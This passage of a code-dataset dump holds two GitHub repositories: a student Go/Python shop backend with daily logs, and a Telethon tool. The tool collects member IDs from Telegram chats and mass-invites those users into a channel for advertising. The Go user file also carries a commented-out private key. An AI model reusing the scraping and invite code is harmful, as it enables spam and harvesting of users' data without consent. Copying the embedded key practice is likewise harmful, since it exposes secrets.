c.JSON(http.StatusOK, u)\n}\n\nfunc CommodityInfo(c echo.Context) error {\n\tcommodityInfo := map[string]string{\n\t\t\"id\": \"\",\n\t\t//\"图片\":\"\",\n\t}\n\tc.Bind(&commodityInfo)\n\n\tvar commodity 
model.Commodity\n\tcommodity = model.CommodityInfo(commodityInfo)\n\tu := &commodity\n\tfmt.Println(commodity)\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc PopluarRank(c echo.Context) error{\n\tuserInfo := map[string]string{\n\t\t\"hits\": \"yes\",\n\t}\n\tc.Bind(&userInfo)\n\n\tvar commodity []model.Commodity\n\n\tcommodity=model.PopularRank(userInfo)\n\tu := &commodity\n\treturn c.JSON(http.StatusOK, u)\n}\n\n\n" }, { "alpha_fraction": 0.27272728085517883, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 3, "blob_id": "bb4aad643e9d8352cf7a9f5068c7a69a5a54be14", "content_id": "56e9c3e2560f20e5b2f0c721290198fa2eee6b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17, "license_type": "no_license", "max_line_length": 6, "num_lines": 3, "path": "/Old-Li883/日报/7.24.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.24\n\n写前段" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 8.666666984558105, "blob_id": "c81c58d035cf14cf330073e9326ea908464c612b", "content_id": "d7371a6c1b82b6cb8a64ce9bf6daf90abd083a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/jackwener/日报/7.24.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.24\n\n配置nginx,学习juery,写前端。\n" }, { "alpha_fraction": 0.7441860437393188, "alphanum_fraction": 0.7558139562606812, "avg_line_length": 13.333333015441895, "blob_id": "39ec5a0f524b2d8a4b5eacd821d98ce5b61377d0", "content_id": "c48dd73e4f8939910c64aa6e81d70cffde66acd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 428, "license_type": "no_license", "max_line_length": 110, "num_lines": 18, "path": "/yixiaoer/日报/7.16.md", "repo_name": 
"tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16日报\n\n## 今日计划\n* 实现成员申请组别管理员的同意\n* 了解postman的使用\n\n## 完成情况\n###\n* 当出现“Too many arguments to return Reports incompatible types.”注意检查func(xxx xxx)后面有没有接xxx(func要return xxx的时候)\n* golang中不允许循环导包\n\n\n管理员如何收到要更改的消息➡️可以通过状态\n路由emmm\n### 关于postman\n\n明日继续\nto be continued\n" }, { "alpha_fraction": 0.648777186870575, "alphanum_fraction": 0.65794837474823, "avg_line_length": 25.29464340209961, "blob_id": "843c2e3fd67e3c7a41fd611417a7d5ac38d9d79b", "content_id": "b829b0305537b00647e0d67f4c3f815869420686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3114, "license_type": "no_license", "max_line_length": 90, "num_lines": 112, "path": "/yixiaoer/server/src/project2/model/commodity.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package model\n\nimport (\n\t\"gopkg.in/mgo.v2\"\n\t\"gopkg.in/mgo.v2/bson\"\n\t\"fmt\"\n)\n\ntype Commodity struct {\n\tId bson.ObjectId ` json:\"id\" form:\"id\" query:\"id\" bson:\"_id\"`\n\tTitle string `json:\"title\" form:\"title\" query:\"title\" bson:\"title\"`\n\tInfo string `json:\"info\" form:\"info\" query:\"info\" bson:\"info\"`\n\tPrice int `json:\"price\" form:\"price\" query:\"price\" bson:\"price\"`\n\tPicture string `json:\"picture\" form:\"picture\" query:\"picture\" bson:\"picture\"`\n\tCategory string `json:\"category\" form:\"category\" query:\"category\" bson:\"category\"`\n\tLocation string `json:\"location\" form:\"location\" query:\"location\" bson:\"location\"`\n\tHits int `json:\"hits\" form:\"hits\" query:\"hits\" bson:\"hits\"`\n}\n\n//按类别查询\nfunc ShowCategory(u map[string]string) []Commodity {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\tvar commodities []Commodity//用切片来存放所有查询结果\n\terr = 
c.Find(bson.M{\"category\": u[\"category\"]}).All(&commodities)\n\tfmt.Println(\"test\")\n\tfmt.Println(err)\n\tfmt.Println(commodities)\n\tfmt.Println(\"test over\")\n\treturn commodities\n}\n\n//按地域查询\nfunc ShowLocation(u map[string]string) []Commodity {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\t//var commodities []Commodity //用切片来存放所有查询结果\n\tvar commodities []Commodity\n\tc.Find(bson.M{\"location\": u[\"location\"]}).All(&commodities)\n\treturn commodities\n}\n\n//商品页面\n\nfunc CommodityInfo(u map[string]string) Commodity {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\tvar commodity Commodity\n\tc.Find(bson.M{\"_id\": bson.ObjectIdHex(u[\"id\"])}).One(&commodity)\n\n\t//c.Find(bson.M{\"id\": u[\"id\"]}).One(&commodity)\n\t//c.Find(bson.M{\"图片\": u[\"图片\"]}).One(&commodity)\n\n\treturn commodity\n}\n\n//热度查看\nfunc PopularRank(u map[string]string) []Commodity {\n\tvar commodities []Commodity\n\tif u[\"hits\"] == \"yes\" {\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\n\t\t// Optional. Switch the session to a monotonic behavior.\n\t\tsession.SetMode(mgo.Monotonic, true)\n\t\tc := session.DB(\"商城\").C(\"商品\")\n\n\t\tc.Find(nil).Sort(\"-hits\").All(&commodities) // 按照点击量升序排列\n\t}\n\treturn commodities\n}\n\nfunc CommodityHits(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. 
Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"商城\").C(\"商品\")\n\n\tselector := bson.M{\"title\": u[\"title\"]}\n\tdata := bson.M{\"$set\": bson.M{\"hits\": u[\"hits\"]}}\n\tc.Update(selector, data)\n}" }, { "alpha_fraction": 0.6990291476249695, "alphanum_fraction": 0.6990291476249695, "avg_line_length": 11.875, "blob_id": "d8a6795e81e3661f302d05028ca97a47a0dd0432", "content_id": "8e422e24da29943734fe51d55a08a8fa13b58000", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 103, "license_type": "no_license", "max_line_length": 27, "num_lines": 8, "path": "/jackwener/server/练手/models/json.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport \"hello/models/class\"\n\ntype Info struct{\n\tUser []class.User\n\tResult bool\n}\n" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.8225806355476379, "avg_line_length": 11.600000381469727, "blob_id": "f0934b1f8e91cc9d54a7665c0800183c3f07525e", "content_id": "cf17c36efccbc88a2ca00c9ef08ed1f7371d6519", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/Old-Li883/日报/7.23.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.23\n\njs练手,在各位大佬的帮助下进行nginx配置,成功从前段访问了后台,并获取了数据\n\n下一步计划,写前段页面" }, { "alpha_fraction": 0.7816593647003174, "alphanum_fraction": 0.7991266250610352, "avg_line_length": 12.529411315917969, "blob_id": "bb41840803839d579f5e0ba9857420c44aba4146", "content_id": "d40b10220554f8712504317821d32350db879c0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 585, "license_type": "no_license", "max_line_length": 73, "num_lines": 17, "path": "/jackwener/日报/7.6.md", "repo_name": "tofar/bingyan-summer-camp2018", 
"src_encoding": "UTF-8", "text": "# 程序组文杰7.6日报\n\n## 早上\n\n主要是看《Linux内核设计与实现》这本书,想复习一下操作系统的知识,没有复习多少,几个问题纠结了比较久,像优先级nice值和时间片的映射关系等。\n\n## 下午\n\n继续上午的事情了1.5个小时,然后看了一些go语言的知识,做了预备性点工作\n\n## 晚上\n\n主要是把http权威指南第三章看了,看了菜鸟教程上的前端部分\n\n## 总结\n\n对自己的学习效率不满意,今天也算是个试探过程,后面希望能提高效率,理清下学习脉络。" }, { "alpha_fraction": 0.5733598470687866, "alphanum_fraction": 0.5896620154380798, "avg_line_length": 20.32203483581543, "blob_id": "a7de2cf14756dd7bbe0c7789cd223f4b21b9ac97", "content_id": "bf81178d4a184dd1d8a4995dc28ba29c81fc09a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2757, "license_type": "no_license", "max_line_length": 72, "num_lines": 118, "path": "/yixiaoer/server/src/project2/model/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package model\n\nimport (\n\t\"gopkg.in/mgo.v2\"\n\t\"gopkg.in/mgo.v2/bson\"\n)\n\ntype User struct {\n\tId string `json:\"id\" form:\"id\"query:\"id\"`\n\tPassword string `json:\"password\" form:\"password\"query:\"password\"`\n\tEmail string `json:\"email\" form:\"email\" query:\"email\"`\n\tPhone string `json:\"phone\" form:\"phone\" query:\"phone\"`\n\tName string `json:\"name\" form:\"name\" query:\"name\"`\n\tHits string `json:\"hits\" form:\"hits\" query:\"hits\"`\n}\n\n//var Publickey = `-----BEGIN 公钥-----\n//MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDS3pFbkT33ioFIh7kFb/zByVnU\n//lQ5OnFvSLYXM42LmzS9ppE5nvk5VBLF1MiwQlHCrM/94cxVQ+3jBZPkrmx8Ulii8\n//9kAXn+YGgpApUYiC/5tRdSY8C4TkqHbJD/wEgweTsD3CRBxSMyfKKRUh4/Wu7Trx\n//FPiBDvurxCqQyC/vpQIDAQAB\n//-----END 公钥-----\n//`\n//\n//var Pirvatekey = `-----BEGIN 
私钥-----\n//MIICoTAbBgkqhkiG9w0BBQMwDgQI4TCFXuyfWGUCAggABIICgNemXWIGNtUETmtR\n//vP5QkQ+ItX7DtsX/K3NHLiEaG0IDyoeiBX9nwt9TbQk/erCTBbp4N/YOXYVlMcws\n//FTPhaCIEJqYnM/ZYhLHz0gofEQaFqTvJYe04mF7kY2B1UujjinZhEJMpmuf4kxOw\n//NdD9zCU5/YC00qZlTfdXo11z5e5SF/8bBTCzFnsgoI16SmhHq2NbMsZoRDS7EhDb\n//h+t3UWS/QGk8t5DBc63UTlzxP0yA6Ef1/eMRkgAOfJPP9ED7EHxP81zBLj/U6pC8\n//06lvK/qJOMD+WtwLdP4mNAvyoHAjUvoROtXxTldnoBUaRoO853EuCvzhbm0str63\n//y4khPflzLsPzB3MW1hftjS2cPNjliPntBMdk+sPhDbXAtwrzMn1/4oTtvJU/kKN/\n//Iz22o7a6dtScc9PanS/RIr6AtZBWbP46+dv66yx+4J66Z8V2TnmzVYJIQLt3Y5cj\n//ai7/d0X6WKr1XN0eqFxDwniUgrdNzK9SCi4kd0XypTg9lNQzqF/V9bO5f3oDJzYS\n//2eH/PMgtLGa6H3d7DezQzw89MELVuWvaG8UdsGhhjsAtAWfgOFo2KRBpGAbIZbIp\n//uAXIIUTb6JZT3vozVOsGXOYUEK9J8FNovTUGAXNlZhC5xlyRlezHRd2dKLRpmbHq\n//LDsJJaN6g1q4u1mKBPlZK3oEdAv6kODdkcKaJbbwyAE3KfzOpFrczeequ/5mVLrY\n//8edC4l+IWDoxE/QmgLWkbSkjgQEXnPw3p6xCfyVgSMdDHAn2S2nZm8offeUMZj8R\n//pbwPL3evdevZzaADoABv9OejCpep2nK1/sFMzKUYLxSY3+00/74872Gy49PHbfDi\n//0APM9yg=\n//-----END 私钥-----\n//`\n\nfunc Login(u map[string]string) int8 {\n\tvar i int8\n\tif u [\"name\"] != \"\" && u[\"password\"] != \"\" {\n\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"商城\").C(\"用户\")\n\n\t\tvar user1 User\n\t\tvar user2 User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user1) //id由数据库分配,不方便登陆,用name登陆\n\t\tif user1.Name != \"\" { //查找是否存在这个name的用户\n\t\t\tc.Find(bson.M{\"name\": u[\"name\"],\n\t\t\t\t\"password\": u[\"password\"]}).One(&user2)\n\t\t\tif user2.Name != \"\" {\n\t\t\t\ti = 0 //若存在查找是否这个name的用户pw也一致\n\t\t\t} else if user2.Name == \"\" {\n\t\t\t\ti = 1 //密码错误\n\t\t\t}\n\t\t} else if user1.Name == \"\" {\n\t\t\ti = 2 //没有这个name的用户\n\t\t}\n\n\t} else {\n\t\ti = 2\n\t}\n\treturn i\n}\n\nfunc SignUp(u map[string]string) int8 {\n\tvar i int8\n\tprintln(u)\n\tif u[\"password\"] != \"\" && u[\"name\"] != \"\" && u[\"phone\"] != \"\" 
{\n\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"商城\").C(\"用户\")\n\n\t\tvar user User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user)\n\t\tif user.Name == \"\" {\n\t\t\tc.Insert(&u)\n\t\t\ti = 0 //数据库中之前不存在这个name,可以注册\n\t\t} else {\n\t\t\ti = 1 //数据库中已有这个name\n\t\t}\n\t} else {\n\t\ti = 2 //数据不完整\n\t}\n\treturn i\n}\n\nfunc UserInfo(u map[string]string)User{\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"商城\").C(\"用户\")\n\n\tvar user User\n\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user)\n\treturn user\n}\n\nfunc UserHits(u map[string]string){\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"商城\").C(\"用户\")\n\n\tselector := bson.M{\"name\": u[\"name\"]}\n\tdata := bson.M{\"$set\": bson.M{\"hits\": u[\"hits\"]}}\n\tc.Update(selector, data)\n}" }, { "alpha_fraction": 0.6030569672584534, "alphanum_fraction": 0.6030569672584534, "avg_line_length": 34.3934440612793, "blob_id": "a0ce8e1907e2d491d879f4f8d7b076ca4018ebe2", "content_id": "76ec05f426d4650d237f2924d81761279267f2ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2277, "license_type": "no_license", "max_line_length": 83, "num_lines": 61, "path": "/Old-Li883/mall/views/merchant_views.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom werkzeug.security import generate_password_hash\nfrom views import app\nfrom model.merchant import m_register, add_commodity, de_commodity, check_commodity\nfrom model.merchant 
import modify_commodity, modify_merchant\n\n\[email protected]('/api/merchant/registration', methods=['post'])\ndef m_registration():\n data = request.get_json()\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n addr = data['addr']\n return m_register(id, password, email, addr)\n\n\[email protected]('/api/merchant/commodity', methods=['GET', 'POST'])\ndef commodity():\n react = request.args.get('react')\n if react == 'add':\n data = request.get_json()\n id = data['id']\n price = data['price']\n clss = data['clss']\n photo = data['photo'] # 图片传过来的是后是按照一个像素一个像素传过来的\n commodity_rest = data['commodity_rest']\n merchant_id = request.cookies.get(\"id\")\n return add_commodity(id, price, clss, photo, commodity_rest,\n merchant_id)\n elif react == 'delete':\n data = request.get_json()\n merchant_id = request.cookies.get(\"id\")\n id = data['id'] # 删除商品只用传过来商品id即可\n return de_commodity(id, merchant_id)\n elif react == 'check':\n merchant_id = request.cookies.get(\"id\")\n return check_commodity(merchant_id)\n\n\[email protected]('/api/merchant/modification', methods=['post'])\ndef modification():\n ob = request.args.get('ob')\n data = request.get_json()\n if ob == 'merchant':\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n addr = data['addr']\n return modify_merchant(id, password, email, addr)\n elif ob == 'commodity':\n id = data['id']\n price = data['price']\n clss = data['clss']\n photo = data['photo'] # 图片传过来的是后是按照一个像素一个像素传过来的\n commodity_rest = data['commodity_rest']\n merchant_id = request.cookies.get(\"id\")\n return modify_commodity(id, price, clss, photo, commodity_rest,\n merchant_id)\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 19.5, "blob_id": "5731fd451303e3ff50e3ca88166f45a5c65429b2", "content_id": "6a09d968e73fa5b5e1a691c460ac47bde8cc6180", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/yixiaoer/server/src/app.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3.6\n# coding: utf-8\n\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 17.83333396911621, "blob_id": "3bfc9f74c38de508d1c508e3136853c3f0b2c0bc", "content_id": "8c5ee4c31a526f0fd547f585243c149f9b722b3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 112, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/Old-Li883/mall/util/response.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "import json\n\n\ndef response(code, data=None):\n res = {'status': code, 'data': data}\n return json.dumps(res)" } ]
114
Lbatson/arduino-bitcoin-ticker
https://github.com/Lbatson/arduino-bitcoin-ticker
386db42bff55ca0a7feda37171c7a4b56dfef589
9aa461c7d4216c2f0063ddc4949c992e28fce94a
2be05dcfdd8c93c012738c57a27456eab145fc7f
refs/heads/master
2016-09-06T09:29:03.450869
2014-01-07T23:10:03
2014-01-07T23:10:03
15,719,347
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5815047025680542, "alphanum_fraction": 0.6144200563430786, "avg_line_length": 19.612903594970703, "blob_id": "cb440c1d5b7604321f15da19b1918128af178619", "content_id": "291f32bd3589d1c9e108a4ff0a2d697e8cdb3c1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 638, "license_type": "no_license", "max_line_length": 42, "num_lines": 31, "path": "/serialdisplay.ino", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "// bitcoin_display.ino\n#include <LiquidCrystal.h>\n\n// Initialze lcd display\nLiquidCrystal lcd(12, 11, 5, 4, 3, 2);\n\nvoid setup() {\n // Open serial port and start lcd screen\n Serial.begin(9600);\n lcd.begin(16, 2);\n}\n\nvoid loop() {\n // Check for serial data input\n if (Serial.available()) {\n // Set serial data to vars\n float buy = Serial.parseFloat();\n char end = Serial.read();\n float sell = Serial.parseFloat();\n\n // Display data to lcd\n lcd.clear();\n lcd.print(buy);\n lcd.setCursor(7,0);\n lcd.print(\"Buy\");\n lcd.setCursor(0,1);\n lcd.print(sell);\n lcd.setCursor(7,1);\n lcd.print(\"Sell\");\n }\n}" }, { "alpha_fraction": 0.595588207244873, "alphanum_fraction": 0.625, "avg_line_length": 23.058822631835938, "blob_id": "1c844ff1c7655ac33b72453a884640af851534b3", "content_id": "6191232c14b4bfe094c98f758ed6f53f8e85532e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "no_license", "max_line_length": 76, "num_lines": 17, "path": "/bitcoin_ticker.py", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "import requests\nimport serial\nimport time\n\nser = serial.Serial('/dev/tty.usbmodemfd1331', baudrate=9600)\ntime.sleep(2)\n\nif ser.isOpen():\n while (True):\n r = requests.get('http://data.mtgox.com/api/2/BTCUSD/money/ticker_fast')\n r = r.json()\n buy = r['data']['buy']['value']\n sell = r['data']['sell']['value']\n 
ser.write(str(buy))\n ser.write('\\n')\n ser.write(str(sell))\n time.sleep(25)" }, { "alpha_fraction": 0.6907894611358643, "alphanum_fraction": 0.6907894611358643, "avg_line_length": 37, "blob_id": "dcc2dece2d371021ccfdaa3959e50ba87d07f616", "content_id": "383c42a4413170c1c143215b54a49648a21fe113", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 104, "num_lines": 4, "path": "/README.md", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "arduino-bitcoin-ticker\n======================\n\nsimple setup that requests data from Mt.Gox api and sends data via usb serial to Arudino for LCD display\n" }, { "alpha_fraction": 0.5111111402511597, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 14, "blob_id": "6e767a59c9665c70bb223d9301205ff5d5fd0daa", "content_id": "42abfbc93e78a95839e881ab83e5fc78348dc2cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 45, "license_type": "no_license", "max_line_length": 15, "num_lines": 3, "path": "/requirements.txt", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "pyserial==2.7\nrequests==2.1.0\nwsgiref==0.1.2\n" } ]
4
Max0nyM/TelegramAd
https://github.com/Max0nyM/TelegramAd
cbeb369ac6b8a24e4a541878875d534d90f90c0c
36e559689c1968ecb3ab8baa93d158edebe6f942
4d222def3c65bddcd658f80cd75155a6df713670
refs/heads/master
2020-03-20T19:46:22.445131
2018-04-10T16:21:28
2018-04-10T16:21:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7665198445320129, "alphanum_fraction": 0.7698237895965576, "avg_line_length": 30.35714340209961, "blob_id": "bfe2d476e9b47f14b5942c9be18a4da390eee1d6", "content_id": "6418b1625caad1bd21e92e7982373b3f5ebc576e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "no_license", "max_line_length": 113, "num_lines": 28, "path": "/inviteToChannel.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from telethon.tl.functions.channels import InviteToChannelRequest\r\nfrom telethon.tl.functions.contacts import ResolveUsernameRequest\r\nfrom telethon.errors.rpc_error_list import UsernameInvalidError, UsernameNotOccupiedError, ChatAdminRequiredError\r\nfrom telethon.tl.types import InputChannel, InputUser\r\n\r\n\r\n\r\ndef inviteToChannel(client, channel, id_list):\r\n\t#Checking for not existing \r\n\ttry:\r\n\t\tresolve = client(ResolveUsernameRequest(channel))\r\n\texcept UsernameInvalidError:\r\n\t\tprint(\"Incorrect name of channel! Try again.\")\r\n\t\treturn False\r\n\texcept UsernameNotOccupiedError:\r\n\t\tprint(\"Incorrect name of channel! 
Try again.\")\r\n\t\treturn False\r\n\r\n\tchat_id = resolve.chats[0].id\r\n\taccess_hash = resolve.chats[0].access_hash\r\n\r\n\tinput_channel = InputChannel(chat_id, access_hash)\r\n\t\r\n\tfor id in id_list:\r\n\t\tinput_user = InputUser(id, 0)\r\n\t\tInviteToChannelRequest(input_channel, input_user)\r\n\r\n\treturn True\r\n\r\n" }, { "alpha_fraction": 0.745394766330719, "alphanum_fraction": 0.75, "avg_line_length": 27.129629135131836, "blob_id": "80222ece8e8970b0d18b3e273dc6d36cf72db90f", "content_id": "942dc4b0361b85ff01089165bf93f0d7b42a64a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 113, "num_lines": 54, "path": "/getId.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from telethon.tl.types import InputChannel\nfrom telethon.tl.functions.contacts import ResolveUsernameRequest\nfrom telethon.tl.functions.channels import GetParticipantsRequest\nfrom telethon.tl.types import ChannelParticipantsSearch\nfrom telethon.errors.rpc_error_list import UsernameInvalidError, UsernameNotOccupiedError, ChatAdminRequiredError\n\ndef getId(client, chatName, limit, debug=False):\n\t#Checking for not existing \n\ttry:\n\t\tresolve = client(ResolveUsernameRequest(chatName))\n\texcept UsernameInvalidError:\n\t\tprint(\"Incorrect name of chat! Try again.\")\n\t\treturn False\n\texcept UsernameNotOccupiedError:\n\t\tprint(\"Incorrect name of chat! 
Try again.\")\n\t\treturn False\n\n\t#Checking for chat or no\n\ttry:\n\t\taccess_hash = resolve.chats[0].access_hash\n\t\tchat_id = resolve.chats[0].id\n\texcept IndexError:\n\t\tprint(\"It's not a chat!\")\n\t\treturn False\n\n\tinput_channel = InputChannel(chat_id, access_hash)\n\tfilter = ChannelParticipantsSearch('')\n\toffset = 0\n\thash = 0\n\tallId = []\n\n\t#Checking for channel/private chat\n\ttry:\n\t\tclient(GetParticipantsRequest(input_channel, filter, offset, limit, hash))\n\texcept ChatAdminRequiredError:\n\t\tprint('It is channel/private chat!')\n\t\treturn False\n\n\tcount = 0\n\twhile True:\n\t\tif count == limit:\n\t\t\tbreak\n\t\tpart = client(\n\t\t\tGetParticipantsRequest(input_channel, filter, offset, limit, hash), \n\t\t\t)\n\t\tif not part.users:\n\t\t\tbreak\n\t\tallId.append(part.users[count].id)\n\t\tcount+=1\n\t\toffset+=1\n\t\tprint('{}/{}'.format(count, limit), end='\\r')\n\t\tif debug:\n\t\t\tprint(part.users[count].id)\n\treturn allId\n\n" }, { "alpha_fraction": 0.6853932738304138, "alphanum_fraction": 0.6891385912895203, "avg_line_length": 16.866666793823242, "blob_id": "3ac996dc1dd320d8eb6b2c224e34917b6c1b39fc", "content_id": "822a625421b5084a19f0feefb742c4a26c17b364", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "no_license", "max_line_length": 57, "num_lines": 15, "path": "/writeToExcel.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "import xlwt\n\ndef writeToExcel(id_list, fileName, sheetName=\"UsersID\"):\n\t#Init workbook \n\twb = xlwt.Workbook()\n\n\t#Add sheet\n\tws = wb.add_sheet(sheetName)\n\n\t#Write to sheet\n\tfor i in range(len(id_list)):\n\t\tws.write(i, 0, id_list[i])\n\n\t#Saving in file\n\twb.save(fileName)" }, { "alpha_fraction": 0.707135796546936, "alphanum_fraction": 0.707135796546936, "avg_line_length": 24.884614944458008, "blob_id": "c8fb02f790ac7e4405cabdd6e32e850885c17407", "content_id": 
"13d0ee1835f6784421d463679f7a36c651462a0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2018, "license_type": "no_license", "max_line_length": 82, "num_lines": 78, "path": "/init.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from telethon import TelegramClient\nfrom configparser import ConfigParser\nimport os #For clear terminal\n\n\ndef initClient(configName='config.ini'):\n\t#Checkin if not inited\n\tif not os.path.exists(configName):\n\t\tprint(\"Config file doesn't exist!\")\n\t\treturn\n\n\t#Init config to read\n\tconfig = ConfigParser()\n\tconfig.read(configName)\n\n\t#Get basic information\n\tapi_id = config.get(\"TelegramAPI\", \"api_id\")\n\tapi_hash = config.get(\"TelegramAPI\", \"api_hash\")\n\tphone = config.get(\"Telegram\", \"phone\")\n\tusername = config.get(\"Telegram\", \"username\")\n\n\t#Init client\n\tclient = TelegramClient(username, api_id, api_hash)\n\tclient.connect()\n\n\t#If not .session file\n\tif not client.is_user_authorized():\n\t\tclient.send_code_request(phone)\n\t\ttry:\n\t\t\tclient.sign_in(phone, input('Enter the code which you had in your telegram: '))\n\t\texcept:\n\t\t\tclient.sign_in(password=input('Enter password: '))\n\n\treturn client\n\ndef initConfig(configName=\"config.ini\"):\n\t#Init configParser\n\tconfig = ConfigParser()\n\tconfig.read(configName)\n\n\t#If has inited\n\tif os.path.exists(configName):\n\t\t#Code below maybe deleted, because if file not exist it not inited\n\t\tisInit = config.get(\"Init\", \"isInit\")\n\t\tif isInit == \"true\":\n\t\t\treturn\n\n\t#Adding sections\n\tconfig.add_section(\"Init\") #is init\n\tconfig.add_section(\"TelegramAPI\") #api_id and api_hash\n\tconfig.add_section(\"Telegram\") #username and phone\n\n\t#Printing welcom\n\tprint(\"**INIT DATA**\")\n\n\t#Input data\n\tapi_id = str(input(\"Enter your api_id: \"))\n\tapi_hash = str(input(\"Enter your api_hash: \"))\n\tphone = str(input(\"Enter 
